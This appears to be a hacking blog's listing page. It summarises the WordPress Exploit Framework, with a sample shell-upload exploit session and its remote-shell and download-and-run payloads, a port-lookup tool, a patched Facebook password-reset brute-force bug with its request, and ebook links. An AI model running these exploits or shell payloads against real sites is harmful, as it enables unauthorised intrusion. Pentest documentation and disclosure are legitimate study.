A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.

What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install .

If bundler is not present on your system, you can install it by running gem install bundler .

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb .

Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

For a full list of supported commands, take a look at This Wiki Page .

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?

• bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
• custom: uploads and executes a custom PHP script.
• download_exec: downloads and runs a remote executable file.
• exec: runs a shell command on the remote server and returns the output to the WPXF session.
• reverse_tcp: uploads a script that will establish a reverse TCP shell.

All these payloads, with the exception of custom , will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on The Wiki and full documentation of the API can be found at http://www.getwpxf.com/doc .

Download WEF

Read More

A Command To Search Port Names And numbers - Whatportis

It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.


Usage

This tool allows you to find what port is associated with a service:

$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 |   tcp    | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

Or, conversely, what service is associated with a port number:

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 |   tcp    | PostgreSQL Database |
| postgresql | 5432 |   udp    | PostgreSQL Database |
+------------+------+----------+---------------------+

You can also search a pattern without knowing the exact name by adding the --like option:

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           |  Port | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  |  1186 |   tcp    | MySQL Cluster Manager             |
| mysql-cluster  |  1186 |   udp    | MySQL Cluster Manager             |
| mysql-cm-agent |  1862 |   tcp    | MySQL Cluster Manager Agent       |
| mysql-cm-agent |  1862 |   udp    | MySQL Cluster Manager Agent       |
| mysql-im       |  2273 |   tcp    | MySQL Instance Manager            |
| mysql-im       |  2273 |   udp    | MySQL Instance Manager            |
| mysql          |  3306 |   tcp    | MySQL                             |
| mysql          |  3306 |   udp    | MySQL                             |
| mysql-proxy    |  6446 |   tcp    | MySQL Proxy                       |
| mysql-proxy    |  6446 |   udp    | MySQL Proxy                       |
| mysqlx         | 33060 |   tcp    | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+

Installation

$ pip install whatportis

JSON output

You can display the results as JSON, using the --json option :

$ whatportis 5432 --json
[
    {
        "description": "PostgreSQL Database",
        "protocol": "tcp",
        "name": "postgresql",
        "port": "5432"
    },
    {
        "description": "PostgreSQL Database",
        "protocol": "udp",
        "name": "postgresql",
        "port": "5432"
    }
]

REST API

Whatportis can also be started as a RESTful API server:

$ whatportis --server localhost 8080
 * Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
"ports": [
  {
    "description": "Description",
    "name": "Service Name",
    "port": "Port Number",
    "protocol": "Transport Protocol"
  },
  ...
]


$ curl http://localhost:8080/ports/3306
{
  "ports": [
    [
      "mysql",
      "3306",
      "tcp",
      "MySQL"
    ],
    [
      "mysql",
      "3306",
      "udp",
      "MySQL"
    ]
  ]
}

$ curl http://localhost:8080/ports/mysql?like
{
  "ports": [
    [
      "mysql-cluster",
      "1186",
      "tcp",
      "MySQL Cluster Manager"
    ],
    [
      "mysql-cluster",
      "1186",
      "udp",
      "MySQL Cluster Manager"
    ],
    ...
}

Notes

• "Why not use grep <port> /etc/services " ? Simply because I want a portable command that display the output in a nice format (a pretty table).
• The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch regularly the website and update the ports.json file. For this reason, an update command will be created in a future version.

Download  Whatportis

Read More

Facebook Password reset vulnerability allowed hackers to hijack any FB account

Hacking Facebook is one of the most sought queries on Google search because a lot of Facebook accounts are valuable. So much so that security researchers spend their valuable time and resources to hunt for vulnerabilities in Facebook in search of that elusive big break. One such ethical researcher, Anand Prakash has hit a jackpot with hacking Facebook. He has found a critical vulnerability in Facebook which could have allowed him to hack into any FB account without a sweat.

The vulnerability which Prakash found, resides in the way Facebook’s beta pages handle ‘Forgot Password’ requests. Normally, when you forget your password, Facebook gives you an option to get back into your FB account using ‘Forgot Password’ option which then sends a 6 digit code on your phone number/email address to your mobile phone. After you enter this code in the window, you are able to access your FB account and reset your password.

Prakash decided to test the vulnerability in Facebook’s Forgot Password mechanism. He tried to brute force the 6 digit code in the ‘Forgot Password’ window but since Facebook has placed a limit of 12 attempts he was unsuccessful and locked out after 12 attempts.

He then turned his attention to Facebook’s beta pages,  beta.facebook.com and mbasic.beta.facebook.com and found that the rate limit was missing on forgot password endpoints in these two pages. Once he found that there was no limitation, he could brute force into any Facebook account without worrying about the limits.

Vulnerable request:


POST /recover/as/code/ HTTP/1.1 Host: beta.facebook.com
lsd=AVoywo13&n=XXXXX


Brute forcing the “n” successfully allowed Prakash to set new password for any Facebook user.

Video of the Proof of Concept

Prakash reported the issue to the Facebook’s security team on 22nd Feb 2016. Facebook immediately acknowledged the severity of the vulnerability and issued a fix on 23rd Feb.  It also awarded Prakash a bug bounty of $15,000 which is among the top bounties by the networking giant.

By OffensiveSec

Read More

Directory with various materials for studies hacking

Obs, I am not responsible by your act with hacking materials, the materials is responsibility the student 

Directory with various materials for studies hacking, reverse engineering, malware, PenTest tools etc.

By OffensiveSec

Access Ebooks

Read More

Hacking Ebooks ++ VI

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ V

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ IV

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ III

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ II

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More